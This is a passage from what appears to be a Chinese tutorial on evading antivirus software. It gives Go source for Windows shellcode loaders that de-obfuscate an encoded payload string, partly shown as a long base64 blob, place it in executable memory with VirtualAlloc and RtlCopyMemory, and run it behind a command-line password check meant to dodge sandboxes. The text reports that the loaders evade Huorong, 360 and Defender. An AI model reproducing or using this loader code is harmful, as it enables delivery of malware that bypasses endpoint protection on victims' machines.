HhiYlx4NThceDhhXHhhMFx4YzdceDEwMFx4ZDZceGVjXHg1YVx4NWNceDQ5XHg4YVx4YzJceDQ5XHgzMlx4ZDNceDRhXHg4YVx4ZDlceDRlXHgzMlx4Y2FceDUzXHg2OVx4MVx4M1x4NDFceDg1XHg1M1x4NTNceDQyXHhiYlx4ZWNceDU2XHgyZlx4M2NceDEwMFx4ZDZceDQ5XHg4YVx4YzdceDQ5XHg4NFx4YzRceDUxXHg2Ylx4Ylx4NjBceDQ5XHg4YVx4ZjJceDQ5XHg4YVx4ZGJceDRhXHhjOFx4YzFceDEwMFx4MTAwXHgxMDBceDEwMFx4NGVceDMyXHhjYVx4NTNceDUzXHg0Mlx4YmJceDJlXHg3XHgxOVx4N2NceDEwMFx4ZDZceDg2XHhjMVx4MTBceDg2XHg5ZVx4Mlx4MVx4MVx4NDlceDEwMFx4ZDBceDEwXHg4NVx4OGRceDJceDFceDFceGVjXHhkNFx4ZWFceGU1XHgyXHgxXHgxXHhlOVx4YTNceDEwMFx4MTAwXHgxMDBceDMwXHg1Ylx4NmVceDRhXHg0ZVx4MVx4MzZceDUwXHgyMlx4NTFceDI2XHg0MVx4NDJceDUxXHg1Y1x4MzVceDVkXHg1MVx4NWJceDU5XHgzNlx4MzVceDI5XHg1MVx4NWZceDJhXHgzOFx4NDRceDQ0XHgyYVx4MzhceDdlXHgyNVx4NDZceDRhXHg0NFx4NDJceDUzXHgyZVx4NTRceDU1XHg0Mlx4NGZceDQ1XHg0Mlx4NTNceDQ1XHgyZVx4NDJceDRmXHg1NVx4NGFceDU3XHg0YVx4NTNceDU2XHg1NFx4MmVceDU1XHg0Nlx4NTRceDU1XHgyZVx4NDdceDRhXHg0ZFx4NDZceDIyXHgyNVx4NDlceDJjXHg0OVx4MmJceDFceDM2XHg1MFx4MjJceDUxXHgyNlx4MVx4NTZceDc0XHg2Nlx4NzNceDJlXHg0Mlx4NjhceDY2XHg2Zlx4NzVceDNiXHgyMVx4NGVceDcwXHg3Ylx4NmFceDZkXHg2ZFx4NjJceDMwXHgzNVx4MmZceDMxXHgyMVx4MjlceDY0XHg3MFx4NmVceDcxXHg2Mlx4NzVceDZhXHg2M1x4NmRceDY2XHgzY1x4MjFceDRlXHg1NFx4NGFceDQ2XHgyMVx4MzlceDJmXHgzMVx4M2NceDIxXHg1OFx4NmFceDZmXHg2NVx4NzBceDc4XHg3NFx4MjFceDRmXHg1NVx4MjFceDM2XHgyZlx4MzJceDNjXHgyMVx4NTVceDczXHg2YVx4NjVceDY2XHg2Zlx4NzVceDMwXHgzNVx4MmZceDMxXHgzY1x4MjFceDQzXHg1NVx4NTNceDU0XHgzMlx4MzNceDM2XHgzNlx4MzNceDM3XHgyYVx4ZVx4Ylx4MVx4MzZceDUwXHgyMlx4NTFceDI2XHg0MVx4NDJceDUxXHg1Y1x4MzVceDVkXHg1MVx4NWJceDU5XHgzNlx4MzVceDI5XHg1MVx4NWZceDJhXHgzOFx4NDRceDQ0XHgyYVx4MzhceDdlXHgyNVx4NDZceDRhXHg0NFx4NDJceDUzXHgyZVx4NTRceDU1XHg0Mlx4NGZceDQ1XHg0Mlx4NTNceDQ1XHgyZVx4NDJceDRmXHg1NVx4NGFceDU3XHg0YVx4NTNceDU2XHg1NFx4MmVceDU1XHg0Nlx4NTRceDU1XHgyZVx4NDdceDRhXHg0ZFx4NDZceDIyXHgyNVx4NDlceDJjXHg0OVx4MmJceDFceDM2XHg1MFx4MjJceDUxXHgyNlx4NDFceDQyXHg1MVx4NWNceDM1XHg1ZFx4NTFceDViXHg1OVx4MzZceDM1XHgyOVx4NTFceDVmXHgyYVx4MzhceDQ0XHg0NFx4MmFceDM4XHg3ZVx4MjVceDQ2XHg0YVx4NDRceDQyXHg1M1x4MmVceDU0XHg1NVx4NDJceDRmXHg0NVx4NDJceDUzXHg0NVx4MmVceDQyXHg0Zlx4NTVceDRhXHg1N1x4NGFceDUzXHg1Nlx4NTRceDJlXHg1NVx4NDZceDU0XHg1NVx4MmVceDQ3XHg0YVx4NGRceDQ2XHgyMlx4MjVceDQ5XHgyY1x4NDlceDJiXHgxXHgzNlx4NTBceDIyXHg1MVx4MjZceDQxXHg0Mlx4NTFceDVjXHgzNVx4NWRceDUxXHg1Ylx4NTlceDM2XHgzNVx4MjlceDUxXHg1Zlx4MmFceDM4XHg0NFx4NDRceDJhXHgzOFx4N2VceDI1XHg0Nlx4NGFceDQ0XHg0Mlx4NTNceDJlXHg1NFx4NTVceDQyXHg0Zlx4NDVceDQyXHg1M1x4NDVceDJlXHg0Mlx4NGZceDU1XHg0YVx4NTdceDRhXHg1M1x4NTZceDU0XHgyZVx4NTVceDQ2XHg1NFx4NTVceDJlXHg0N1x4NGFceDRkXHg0Nlx4MjJceDI1XHg0OVx4MmNceDQ5XHgyYlx4MVx4MzZceDUwXHgyMlx4NTFceDI2XHg0MVx4NDJceDUxXHg1Y1x4MVx4NDJceGJmXHhmMVx4YjZceGEzXHg1N1x4MTAwXHhkNlx4NDlceDMyXHhjYVx4YmJceDFceDFceDQxXHgxXHg0Mlx4YjlceDFceDExXHgxXHgxXHg0Mlx4YmFceDQxXHgxXHgxXHgxXHg0Mlx4YmJceDU5XHhhNVx4NTRceGU2XHgxMDBceGQ2XHg0OVx4OTRceDU0XHg1NFx4NDlceDhhXHhlOFx4NDlceDhhXHhmMlx4NDlceDhhXHhkYlx4NDJceGI5XHgxXHgyMVx4MVx4MVx4NGFceDhhXHhmYVx4NDJceGJiXHgxM1x4OTdceDhhXHhlM1x4MTAwXHhkNlx4NDlceDg0XHhjNVx4MjFceDg2XHhjMVx4NzVceGI3XHg2N1x4OGNceDhceDQ5XHgyXHhjNFx4ODZceGMxXHg3Nlx4ZDhceDU5XHg1OVx4NTlceDQ5XHg2XHgxXHgxXHgxXHgxXHg1MVx4YzRceGU5XHhhMFx4ZmVceDEwMFx4MTAwXHgzMlx4M2FceDMzXHgyZlx4MzJceDM3XHgzOVx4MmZceDM3XHgzMVx4MmZceDMyXHgzNFx4MzdceDFceDFceDFceDFceDE="
var payload_byte []byte
shellcode_byte, _ := base64.StdEncoding.DecodeString(xor_shellcode[2:]) // 除混淆字符外base64解码
payload := string(shellcode_byte) // []byte切片转string
payloadb := strings.Split(payload, "\\x")[1:] // 以\x将字符串分割成切片
for i := 0; i < len(payloadb); i++ { // 遍历转16进制
tmp_byte, err1 := strconv.ParseInt(payloadb[i], 16, 32) // 取切片中的字符转16进制
if err1 != nil {
fmt.Println(err1.Error())
}
payload_byte = append(payload_byte, uint8(tmp_byte)) // 加到payload_byte切片中
}
var shellcode []byte
for i := 0; i < len(payload_byte); i++ {
if payload_byte[i] == 255 {
shellcode = append(shellcode, payload_byte[i])
} else {
shellcode = append(shellcode, payload_byte[i]-1) // 递归shellcode-1还原
}
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) // 为shellcode申请内存空间
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println("error------------------------------")
fmt.Println(err.Error())
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) // 将shellcode内存复制到申请出来的内存空间中
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println(err.Error())
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
func main() { // 生成的shellcode值+1并base64编码再在前面加2位混淆字符
condition()
}
// uintptr一个足够大的无符号整型, 用来表示任意地址。
// MEM_COMMIT标志将在页面大小边界上提交页面,而使用MEM_RESERVE或MEM_RESERVE | MEM_COMMIT将在大于页面大小的边界上保留或保留提交页面。
免杀效果
火绒免杀
360免杀
Defender免杀
注:第一次上线未杀,第二次上线动态被杀
VirusTotal
免杀加载器代码
package main
import (
"encoding/base64"
"fmt"
"os"
"strconv"
"strings"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
KEY_1 = 55
KEY_2 = 66
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") // kernel32.dll它控制着系统的内存管理、数据的输入输出操作和中断处理
ntdll = syscall.MustLoadDLL("ntdll.dll") // ntdll.dll描述了windows本地NTAPI的接口
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") // VirtualAlloc申请内存空间
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") // RtlCopyMemory非重叠内存区域的复制
)
func condition() {
var a string
for i := 1; i < len(os.Args); i++ {
a += os.Args[i]
}
b := "qaxnb"
if a == b {
build()
}
}
func build() {
xor_shellcode := " py脚本处理后的shellcode "
var payload_byte []byte
shellcode_byte, _ := base64.StdEncoding.DecodeString(xor_shellcode[2:]) // 除混淆字符外base64解码
payload := string(shellcode_byte) // []byte切片转string
payloadb := strings.Split(payload, "\\x")[1:] // 以\x将字符串分割成切片
for i := 0; i < len(payloadb); i++ { // 遍历转16进制
tmp_byte, err1 := strconv.ParseInt(payloadb[i], 16, 32) // 取切片中的字符转16进制
if err1 != nil {
fmt.Println(err1.Error())
}
payload_byte = append(payload_byte, uint8(tmp_byte)) // 加到payload_byte切片中
}
var shellcode []byte
for i := 0; i < len(payload_byte); i++ {
if payload_byte[i] == 255 {
shellcode = append(shellcode, payload_byte[i])
} else {
shellcode = append(shellcode, payload_byte[i]-1) // 递归shellcode-1还原
}
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) // 为shellcode申请内存空间
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println("error------------------------------")
fmt.Println(err.Error())
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) // 将shellcode内存复制到申请出来的内存空间中
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println(err.Error())
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
func main() { // 生成的shellcode值+1并base64编码再在前面加2位混淆字符
func(data string) {
condition()
}("world!")
}
// uintptr一个足够大的无符号整型, 用来表示任意地址。
// MEM_COMMIT标志将在页面大小边界上提交页面,而使用MEM_RESERVE或MEM_RESERVE | MEM_COMMIT将在大于页面大小的边界上保留或保留提交页面。
免杀效果
火绒免杀
360免杀
Defender稳定免杀
